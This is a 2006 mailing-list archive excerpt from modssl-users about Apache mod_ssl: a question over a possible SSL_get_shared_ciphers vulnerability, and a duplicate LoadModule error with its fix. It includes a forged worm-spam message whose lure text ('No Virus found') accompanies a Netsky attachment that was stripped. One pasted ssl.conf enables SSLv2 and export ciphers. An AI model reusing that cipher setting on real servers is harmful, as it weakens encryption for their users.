really did not make a difference whether ssl.conf is called or not.

The httpd.conf does load mod_ssl in a one-line statement in there.

At this point I am baffled.

Bill Davies
Sacramento
my direct email is:	bdavies  - at -  macnexus - dot - org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Oct 26 22:21:26 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id A4B8F14D8AD; Thu, 26 Oct 2006 22:21:26 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from rutherford.zen.co.uk (rutherford.zen.co.uk [212.23.3.142])
	by master.modssl.org (Postfix) with ESMTP id 6679914D856
	for ; Thu, 26 Oct 2006 22:21:25 +0200 (CEST)
Received: from [82.68.229.246] (helo=[192.168.0.34])
	by rutherford.zen.co.uk with esmtp (Exim 4.50)
	id 1GdBix-00018M-Az
	for modssl-users@modssl.org; Thu, 26 Oct 2006 20:21:11 +0000
Message-ID: <454118B6.3050902@darkheim.freeserve.co.uk>
Date: Thu, 26 Oct 2006 21:21:10 +0100
From: Per Olausson 
User-Agent: Thunderbird 1.5.0.7 (Windows/20060909)
MIME-Version: 1.0
To:  modssl-users@modssl.org
Subject: Re: Does Mod_SSL use SSL_get_shared_ciphers()?
References: <453E95AF.10608@darkheim.freeserve.co.uk> <20061024231027.GA2382@ligo.caltech.edu> <453FC92C.5060900@darkheim.freeserve.co.uk> <20061025215422.GA16163@ligo.caltech.edu>
In-Reply-To: <20061025215422.GA16163@ligo.caltech.edu>
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
X-Originating-Rutherford-IP: [82.68.229.246]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Per Olausson 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


So what are the next steps...is this being highlighted as a risk anywhere?

I am surprised that this doesn't get onto the main security page if it 
is a risk...how else would anyone find out about it and take 
preventative measures?

Regards,


Per

Phil Ehrens wrote:
> Interesting. Must be an Apache 2.2.X thing. The symbol
> definitely does not appear in 2.0.55.
>
> Per Olausson wrote:
>   
>> Phil,
>>
>> Is it the way I am building Apache or is Linux or Solaris hiding this
>> symbol? I've checked this on a gentoo build, but on my machine the
>> module has no symbols.
>>
>> Details as below:
>>
>> Apache/2.2.3
>> OpenSSL 0.9.8c
>> AIX 5200-09
>> *
>> nm mod_ssl.so | grep SSL_get_shared_ciphers
>> .SSL_get_shared_ciphers T   269028692
>> .SSL_get_shared_ciphers_139_116 t   269031772*
>>
>> nm(1):
>>
>> T Global text symbol.
>> t Local text symbol.
>>
>> Regards,
>>
>>
>> Per
>>
>> Phil Ehrens wrote:
>>     
>>> Per Olausson wrote:
>>>  
>>>       
>>>>> Phil Ehrens:
>>>>> I just checked a couple different versions and did not see that
>>>>> function.
>>>>>      
>>>>>           
>>>> I posted a question about this to the apache security mailbox, but 
>>>> nobody responded. I guess that is inline with the policy for that 
>>>> mailbox even if I find it somewhat unhelpful, considering that SSL isn't 
>>>> completely a rarity when using Apache.
>>>>
>>>> The reason I am concerned is because mod_ssl indirectly references 
>>>> SSL_get_shared_ciphers. It is in use. You can see this if you use 
>>>> something like nm and grep for this function.
>>>>
>>>> So is mod_ssl vulnerable? Is the functionality insulated and not 
>>>> possible to trigger from the mod_ssl user scenario, or is it?
>>>>
>>>> If anyone have any ideas please let me know!
>>>>    
>>>>         
>>> The symbol is not defined in mod_ssl on any of my Linux or Solaris
>>> systems, all of which are running Apache-2.0.55. What version are
>>> you looking at?
>>> ______________________________________________________________________
>>> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>>> User Support Mailing List                      modssl-users@modssl.org
>>> Automated List Manager                            majordomo@modssl.org
>>>  
>>>       
>> ______________________________________________________________________
>> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>> User Support Mailing List                      modssl-users@modssl.org
>> Automated List Manager                            majordomo@modssl.org
>>     
>
>   

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Oct 26 22:27:45 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 8AAA614D899; Thu, 26 Oct 2006 22:27:45 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from heisenberg.zen.co.uk (heisenberg.zen.co.uk [212.23.3.141])
	by master.modssl.org (Postfix) with ESMTP id 452D514D84B
	for ; Thu, 26 Oct 2006 22:27:44 +0200 (CEST)
Received: from [82.68.229.246] (helo=[192.168.0.34])
	by heisenberg.zen.co.uk with esmtp (Exim 4.50)
	id 1GdBp4-0008Pf-9U
	for modssl-users@modssl.org; Thu, 26 Oct 2006 20:27:30 +0000
Message-ID: <45411A30.5030904@darkheim.freeserve.co.uk>
Date: Thu, 26 Oct 2006 21:27:28 +0100
From: Per Olausson 
User-Agent: Thunderbird 1.5.0.7 (Windows/20060909)
MIME-Version: 1.0
To:  modssl-users@modssl.org
Subject: Re: Does Mod_SSL use SSL_get_shared_ciphers()?
References: <453E95AF.10608@darkheim.freeserve.co.uk> <20061024231027.GA2382@ligo.caltech.edu> <453FC92C.5060900@darkheim.freeserve.co.uk> <20061025215422.GA16163@ligo.caltech.edu>
In-Reply-To: <20061025215422.GA16163@ligo.caltech.edu>
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
X-Originating-Heisenberg-IP: [82.68.229.246]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Per Olausson 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


One more thing. I can see this on 2.0.54 with OpenSSL at 0.9.7d on AIX 
as well.

I think there is something masking this problem on other platforms, or I 
have been building this in some weird and mysterious way you guys don't 
do (highly unlikely I think).

Regards,


Per

Phil Ehrens wrote:
> Interesting. Must be an Apache 2.2.X thing. The symbol
> definitely does not appear in 2.0.55.
>
> Per Olausson wrote:
>   

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Oct 30 12:31:30 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 4D73214D860; Mon, 30 Oct 2006 12:31:30 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from smtp.hispeed.ch (mxout.hispeed.ch [62.2.95.247])
	by master.modssl.org (Postfix) with ESMTP id ED5FB14D836
	for ; Mon, 30 Oct 2006 12:31:29 +0100 (CET)
Received: from zaphod.hitchhiker.ch (84-73-54-197.dclient.hispeed.ch [84.73.54.197])
	(authenticated bits=0)
	by smtp.hispeed.ch (8.12.11.20060308/8.12.6/taifun-1.0) with ESMTP id k9UBVDxx021475
	for ; Mon, 30 Oct 2006 12:31:14 +0100
Received: from localhost (unknown [127.0.0.1])
	by zaphod.hitchhiker.ch (Postfix) with ESMTP id BF1DD1EA91
	for ; Mon, 30 Oct 2006 10:32:19 +0000 (UTC)
Received: from zaphod.hitchhiker.ch ([127.0.0.1])
 by localhost (zaphod [127.0.0.1]) (amavisd-new, port 10024) with ESMTP
 id 18124-10 for ;
 Mon, 30 Oct 2006 11:32:03 +0100 (CET)
Received: from [172.18.1.123] (adsl-135-98.dsl.init7.net [213.144.135.98])
	by zaphod.hitchhiker.ch (Postfix) with ESMTP id E343B1EA93
	for ; Mon, 30 Oct 2006 11:32:02 +0100 (CET)
Message-ID: <4545E26F.9060202@hitchhiker.ch>
Date: Mon, 30 Oct 2006 12:30:55 +0100
From: Serge Hauser 
User-Agent: Thunderbird 1.5.0.7 (Windows/20060909)
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Terminate SSL Session in Apache2.2
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
X-Virus-Scanned: ClamAV version 0.88.5, clamav-milter version 0.88.5 on smtp-06.tornado.cablecom.ch
X-Virus-Scanned: by amavisd-new / clamav (http://clamav.elektrapro.com) at hitchhiker.ch
X-Virus-Status: Clean
X-DCC-spamcheck-01.tornado.cablecom.ch-Metrics: smtp-06.tornado.cablecom.ch 1377;
	Body=1 Fuz1=1 Fuz2=1
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Serge Hauser 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi,

the problem i thought it solved apeared again in 2.2.x, since the api is 
not available anymore. could anyone tell me how to terminate a ssl 
session from my own module with Apache2.2 and mod_ssl ?

thanks
serge
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Nov  1 08:47:01 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 0642D14D88B; Wed,  1 Nov 2006 08:47:01 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from modssl.org (wcoe-98.r-195-35-225.essentkabel.com [195.35.225.98])
	by master.modssl.org (Postfix) with ESMTP id D223114D839
	for ; Wed,  1 Nov 2006 08:46:59 +0100 (CET)
From: rse@engelschall.com
To: modssl-users@modssl.org
Subject: =?utf-8?Q?[Spam]_-_?=Re: Message
Date: Wed, 1 Nov 2006 08:59:34 +0100
MIME-Version: 1.0
Content-Type: multipart/mixed;
	boundary="----=_NextPart_000_0016----=_NextPart_000_0016"
X-Priority: 3
X-MSMail-Priority: Normal
X-GateDefender-Antispam: spam (score=89)
Message-Id: <20061101074659.D223114D839@master.modssl.org>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: rse@engelschall.com
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------=_NextPart_000_0016----=_NextPart_000_0016
Content-Type: multipart/alternative; boundary=GDalert_boundary_503343

--GDalert_boundary_503343
Content-Type: text/plain; charset=UTF-8; format=flowed
Content-Transfer-Encoding: 7bit

+----------------------------------------------------+

Panda GateDefender Performa has detected malicious content (FakefromWorm) in the following file: [attach.zip][data.rtf                                                                           .scr]
W32/Netsky.P.worm

The file has been deleted to protect the network.
01/11/2006 08:44:50 [GMT+0100]

www.pandasoftware.com

+----------------------------------------------------+

--GDalert_boundary_503343
Content-Type: text/html; charset=UTF-8
Content-Transfer-Encoding: quoted-printable





+----------------------------------------------------+

Panda GateDefender Performa has detected malicious content (FakefromWorm) in the following file: [attach.zip][data.rtf                                                                           .scr]
W32/Netsky.P.worm

The file has been deleted to protect the network.
01/11/2006 08:44:50 [GMT+0100]

www.pandasoftware.com

+----------------------------------------------------+





--GDalert_boundary_503343--

------=_NextPart_000_0016----=_NextPart_000_0016
Content-Type: text/plain;
	charset="Windows-1252"
Content-Transfer-Encoding: 7bit

Your important document, correction is finished!

+++ Attachment: No Virus found
+++ Kaspersky AntiVirus - www.kaspersky.com



------=_NextPart_000_0016----=_NextPart_000_0016
Content-Type: application/octet-stream;
	name="attach.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
	filename="attach.zip"

UEsFBgAAAAAAAAAAAAAAAAAAAAAAAA==

------=_NextPart_000_0016----=_NextPart_000_0016--


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Nov  4 19:10:23 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 15B3314D8AA; Sat,  4 Nov 2006 19:10:23 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from wx-out-0506.google.com (wx-out-0506.google.com [66.249.82.229])
	by master.modssl.org (Postfix) with ESMTP id 95D6214D82B
	for ; Sat,  4 Nov 2006 19:10:22 +0100 (CET)
Received: by wx-out-0506.google.com with SMTP id h27so649584wxd
        for ; Sat, 04 Nov 2006 10:10:06 -0800 (PST)
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
        s=beta; d=gmail.com;
        h=received:message-id:date:from:to:subject:mime-version:content-type:content-transfer-encoding:content-disposition;
        b=hbfHjmq1orIFshiGhlHnVPc376EhMj948kolMICgSYmh5OSS07tBWZtORS4oib2w9TFxmEj/83UXvmZp7JyBQHEf5P+gd3j7rR6YGlbb/wV7GMvwH1e2BcrGFxW/ktaJKFdyLz23tfHodABDHgPRiClpRFTMa9LIqAb7e7oRpSY=
Received: by 10.90.90.16 with SMTP id n16mr154127agb.1162663806025;
        Sat, 04 Nov 2006 10:10:06 -0800 (PST)
Received: by 10.90.102.9 with HTTP; Sat, 4 Nov 2006 10:10:05 -0800 (PST)
Message-ID: <30c82f5f0611041010j544f7461y1f5d2efc8b6beed@mail.gmail.com>
Date: Sat, 4 Nov 2006 19:10:05 +0100
From: "Louise Hoffman" 
To: modssl-users@modssl.org
Subject: Howto "unload" the mod_ssl from memory?
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Louise Hoffman" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Dear readers,

Can anyone teach me how to unload/kill/remove the SSL module from
memory, so when I restart Apache the SSL module will be loaded again?

The reason I am asking is because I get this error:

Starting httpd: [Sat Nov 04 18:59:43 2006] [warn] module ssl_module is
already loaded, skipping
[Sat Nov 04 18:59:43 2006] [warn] _default_ VirtualHost overlap on
port 443, the first has precedence
(98)Address already in use: make_sock: could not bind to address [::]:443
no listening sockets available, shutting down
Unable to open logs

and the strangest thing is, if I
~# mv /etc/httpd/conf.d/ssl_conf /etc/httpd/conf.d/ssl_conf_old
~# apachectl restart

it works, but https:// still works on the server.

So I guess if I could unload the module I could make the changes to
ssl_conf that I need, and restart Apache and the new settings would be
loaded.

Can anyone help me with this? =)

Lots of love,
Louise
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Nov  4 19:21:37 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 244FA14D9DE; Sat,  4 Nov 2006 19:21:37 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from wx-out-0506.google.com (wx-out-0506.google.com [66.249.82.233])
	by master.modssl.org (Postfix) with ESMTP id 86CC614D853
	for ; Sat,  4 Nov 2006 19:21:35 +0100 (CET)
Received: by wx-out-0506.google.com with SMTP id h27so650812wxd
        for ; Sat, 04 Nov 2006 10:21:19 -0800 (PST)
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
        s=beta; d=gmail.com;
        h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references;
        b=exEbxfq4tLaiKdyUiRxAceHsGSX27TM9g0qg/2bWnUsof4MFfgFXAgCWoh0aLkUU2lJ1A3DaEYJGwOeu5Qd64wZ6kn0F+XQq7zLUKmcTG34LtNdVJ9I8qIoTF2KhAdYxonyuxwY6xVnyQCXdndcoYGHBQifc6v5aTHB7FN+5nc8=
Received: by 10.90.25.3 with SMTP id 3mr789860agy.1162664479553;
        Sat, 04 Nov 2006 10:21:19 -0800 (PST)
Received: by 10.90.102.9 with HTTP; Sat, 4 Nov 2006 10:21:19 -0800 (PST)
Message-ID: <30c82f5f0611041021l565f9829ie72ad8b7e32219c7@mail.gmail.com>
Date: Sat, 4 Nov 2006 19:21:19 +0100
From: "Louise Hoffman" 
To: modssl-users@modssl.org
Subject: Re: Howto "unload" the mod_ssl from memory?
In-Reply-To: <30c82f5f0611041010j544f7461y1f5d2efc8b6beed@mail.gmail.com>
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
References: <30c82f5f0611041010j544f7461y1f5d2efc8b6beed@mail.gmail.com>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Louise Hoffman" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Replying to my own post.

I have found the problem, and it is not Apache not unloading its modules =)

~# lsof|grep ssl
rpc.idmap  2607    root  mem       REG      253,0    213600    5884682
/lib/libssl.so.0.9.7a
vsftpd     2760    root  mem       REG      253,0    213600    5884682
/lib/libssl.so.0.9.7a
mysqld    31323   mysql  mem       REG      253,0    213600    5884682
/lib/libssl.so.0.9.7a
~#

but rpc.idmap (what ever that is), vsftpd, and mysqld.

One problem solved, another arised =)

Any help I can get is much appreciated =)

Love,
Louise
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Nov  4 19:56:08 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 510BD14D894; Sat,  4 Nov 2006 19:56:08 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from wx-out-0506.google.com (wx-out-0506.google.com [66.249.82.224])
	by master.modssl.org (Postfix) with ESMTP id E840A14D82B
	for ; Sat,  4 Nov 2006 19:56:07 +0100 (CET)
Received: by wx-out-0506.google.com with SMTP id h27so654776wxd
        for ; Sat, 04 Nov 2006 10:55:51 -0800 (PST)
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
        s=beta; d=gmail.com;
        h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references;
        b=D82lie1TE8CNu5Fpa2R3H70O5lWhsCqdVEja5VGYFEj2QQmvtwz7DT0GZNcg7AKrsBVb2xuSSkpP6HV4kF1m5hi7P1maGinxvWULtDC786I11XDZ+qJl9EYHMDaAtNl+yN9XE5KZxQ8XurbsNRW6p91taF0Nmsa1WMnk1RpsXTM=
Received: by 10.90.88.13 with SMTP id l13mr790792agb.1162666541283;
        Sat, 04 Nov 2006 10:55:41 -0800 (PST)
Received: by 10.90.102.9 with HTTP; Sat, 4 Nov 2006 10:55:41 -0800 (PST)
Message-ID: <30c82f5f0611041055h62b9cabdw78088977dca461db@mail.gmail.com>
Date: Sat, 4 Nov 2006 19:55:41 +0100
From: "Louise Hoffman" 
To: modssl-users@modssl.org
Subject: Re: Howto "unload" the mod_ssl from memory?
In-Reply-To: <30c82f5f0611041021l565f9829ie72ad8b7e32219c7@mail.gmail.com>
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
References: <30c82f5f0611041010j544f7461y1f5d2efc8b6beed@mail.gmail.com>
	 <30c82f5f0611041021l565f9829ie72ad8b7e32219c7@mail.gmail.com>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Louise Hoffman" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Replying to my own post again.

Even if I have stopped all daemons that uses libssl, I get the
"module ssl_module is already loaded, skipping" error.

Could there be something very wrong with my ssl.conf? I haven't made
changes to httpd.conf because this howto doesn't do that:
http://www.vanemery.com/Linux/Apache/apache-SSL.html

I have stripped the comments from it to shorten it for this email.

So I am completly out of ideas now... I hope someone at this
mailinglist can help me =)

Hugs,
Louise


LoadModule ssl_module modules/mod_ssl.so

Listen 443

AddType application/x-x509-ca-cert .crt
AddType application/x-pkcs7-crl    .crl

SSLPassPhraseDialog  builtin

SSLSessionCache         shmcb:/var/cache/mod_ssl/scache(512000)
SSLSessionCacheTimeout  300

SSLMutex default

SSLRandomSeed startup file:/dev/urandom  256
SSLRandomSeed connect builtin
SSLCryptoDevice builtin



DocumentRoot "/var/www/html"
ServerName removed.com:443
ServerAdmin removed@removed.com

ErrorLog logs/ssl_error_log
TransferLog logs/ssl_access_log
LogLevel warn

SSLEngine on

SSLCipherSuite ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP

SSLCertificateFile /etc/httpd/conf/ssl.crt/server.crt
SSLCertificateKeyFile /etc/httpd/conf/ssl.key/server.key
SSLCertificateChainFile /etc/httpd/conf/ssl.crt/my-ca.crt
SSLCACertificateFile /etc/httpd/conf/ssl.crt/my-ca.crt


    SSLOptions +StdEnvVars


    SSLOptions +StdEnvVars


SetEnvIf User-Agent ".*MSIE.*" \
         nokeepalive ssl-unclean-shutdown \
         downgrade-1.0 force-response-1.0

CustomLog logs/ssl_request_log \
          "%t %h %{SSL_PROTOCOL}x %{SSL_CIPHER}x \"%r\" %b"


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Nov  5 10:47:19 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 3011714D867; Sun,  5 Nov 2006 10:47:19 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail.ukfsn.org (s2.ukfsn.org [217.158.120.143])
	by master.modssl.org (Postfix) with ESMTP id BE75D14D82E
	for ; Sun,  5 Nov 2006 10:47:18 +0100 (CET)
Received: from localhost (mailman.ukfsn.org [80.168.53.75])
	by mail.ukfsn.org (Postfix) with ESMTP id 3F803E7105
	for ; Sun,  5 Nov 2006 09:43:54 +0000 (GMT)
Received: from mail.ukfsn.org ([80.168.53.20])
	by localhost (smtp-filter.ukfsn.org [80.168.53.75]) (amavisd-new, port 10024)
	with ESMTP id 06192-09 for ;
	Sun, 5 Nov 2006 09:14:48 +0000 (GMT)
Received: from [10.0.0.6] (unknown [87.127.67.22])
	by mail.ukfsn.org (Postfix) with ESMTP id EE811E7005
	for ; Sun,  5 Nov 2006 09:43:53 +0000 (GMT)
Subject: Re: Howto "unload" the mod_ssl from memory?
From: Michael Pacey 
To: modssl-users@modssl.org
In-Reply-To: <30c82f5f0611041055h62b9cabdw78088977dca461db@mail.gmail.com>
References: <30c82f5f0611041010j544f7461y1f5d2efc8b6beed@mail.gmail.com>
	 <30c82f5f0611041021l565f9829ie72ad8b7e32219c7@mail.gmail.com>
	 <30c82f5f0611041055h62b9cabdw78088977dca461db@mail.gmail.com>
Content-Type: text/plain
Organization: wd21 ltd
Date: Sun, 05 Nov 2006 09:47:02 +0000
Message-Id: <1162720022.5704.10.camel@gandalf>
Mime-Version: 1.0
X-Mailer: Evolution 2.6.1 
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Michael Pacey 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This:
module ssl_module is already loaded, skipping

means you have LoadModule ssl_module specified twice in your apache
configuration.

This:
_default_ VirtualHost overlap on port 443, the first has precedence

means you have two virtual hosts defined in your configuration which
conflict because they want to use the same socket (IP address/port
pair).

When you move ssl_conf out the way, SSL still works because you must
have LoadModule ssl_module and an SSL virtual host defined in another
config file. Look through your config files and find the offending
duplicate entries.

What's probably happening is your Apache distribution already has SSL
configured, and when you've followed the SSL howto you've duplicated the
steps required to enable SSL.

That's my tuppence worth anyway. Hope it helps.

--
Michael


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Nov  6 02:20:02 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 30A8D14D878; Mon,  6 Nov 2006 02:20:02 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from wx-out-0506.google.com (wx-out-0506.google.com [66.249.82.224])
	by master.modssl.org (Postfix) with ESMTP id 8291E14D85A
	for ; Mon,  6 Nov 2006 02:20:00 +0100 (CET)
Received: by wx-out-0506.google.com with SMTP id h27so855555wxd
        for ; Sun, 05 Nov 2006 17:19:42 -0800 (PST)
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
        s=beta; d=gmail.com;
        h=received:message-id:date:from:reply-to:organization:user-agent:mime-version:to:subject:references:in-reply-to:content-type:content-transfer-encoding;
        b=FqGIlQRjZMjSSIcxC3tjk8mBVVGylwJfyRazf9wTOcDltrQ7sLQjRhpE6In0GHZqIR195CDbGXbuaykfBlqgG1TG8Bn+Nyq0rM4QY4q6JY5yvy2uDHBI6THaCFf/bX9CsqBglDf+vNtcFdZhVLgcgOEk+xdqWkHdJSlPLp1fFrg=
Received: by 10.70.109.4 with SMTP id h4mr3673029wxc.1162775982064;
        Sun, 05 Nov 2006 17:19:42 -0800 (PST)
Received: from ?192.168.0.115? ( [71.203.235.218])
        by mx.google.com with ESMTP id i19sm7061929wxd.2006.11.05.17.19.40;
        Sun, 05 Nov 2006 17:19:40 -0800 (PST)
Message-ID: <454E8D92.1080302@gmail.com>
Date: Sun, 05 Nov 2006 20:19:14 -0500
From: Patrick Riggins 
Organization: Complete Office Installations, Inc.
User-Agent: Thunderbird 1.5.0.7 (X11/20061008)
MIME-Version: 1.0
To:  modssl-users@modssl.org
Subject: Re: Howto "unload" the mod_ssl from memory?
References: <30c82f5f0611041010j544f7461y1f5d2efc8b6beed@mail.gmail.com>	 <30c82f5f0611041021l565f9829ie72ad8b7e32219c7@mail.gmail.com> <30c82f5f0611041055h62b9cabdw78088977dca461db@mail.gmail.com>
In-Reply-To: <30c82f5f0611041055h62b9cabdw78088977dca461db@mail.gmail.com>
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Patrick Riggins 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Louise Hoffman wrote:
> Replying to my own post again.
> 
> Even if I have stopped all daemons that uses libssl, I get the
> "module ssl_module is already loaded, skipping" error.
> 
> Could there be something very wrong with my ssl.conf? I haven't made
> changes to httpd.conf because this howto doesn't do that:
> http://www.vanemery.com/Linux/Apache/apache-SSL.html

Hi Louise,

   Two things you can check are your httpd.conf and ssl.conf files.
In mine, the httpd.conf file contains:

LoadModule ssl_module modules/mod_ssl.so

and then just a few  lines down:

#
# Load config files from the config directory "/etc/httpd/conf.d".
#
Include conf.d/*.conf


   So this includes *.conf files listed in the conf.d directory (in
mine, this is on the same directory level as the "conf" directory
below /etc/httpd). My ssl.conf file is in this second directory and
has as one of its commands:

LoadModule ssl_module modules/mod_ssl.so

   This was triggering the same error you are seeing on your server.
I kept trying to find out why this module was getting loaded twice
and finally ran it down. I just commented out the "LoadModule..."
command in the httpd.conf file and the problem cleared up (since it
was only getting loaded once now instead of twice: once in the
httpd.conf file and again in the ssl.conf file).

   I do not know if this will apply to your situation but it sounds like
it might be something to check. It took me a couple of hours of digging
around in the filesystem to find that one. I'm a noobie or I guess I 
would have found it quicker.  :-)

Patrick







______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Nov  7 13:35:58 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 71A6914D887; Tue,  7 Nov 2006 13:35:58 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from nf-out-0910.google.com (nf-out-0910.google.com [64.233.182.190])
	by master.modssl.org (Postfix) with ESMTP id 429CD14D873
	for ; Tue,  7 Nov 2006 13:35:57 +0100 (CET)
Received: by nf-out-0910.google.com with SMTP id p48so140377nfa
        for ; Tue, 07 Nov 2006 04:35:41 -0800 (PST)
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
        s=beta; d=googlemail.com;
        h=received:message-id:date:from:to:subject:mime-version:content-type:content-transfer-encoding:content-disposition;
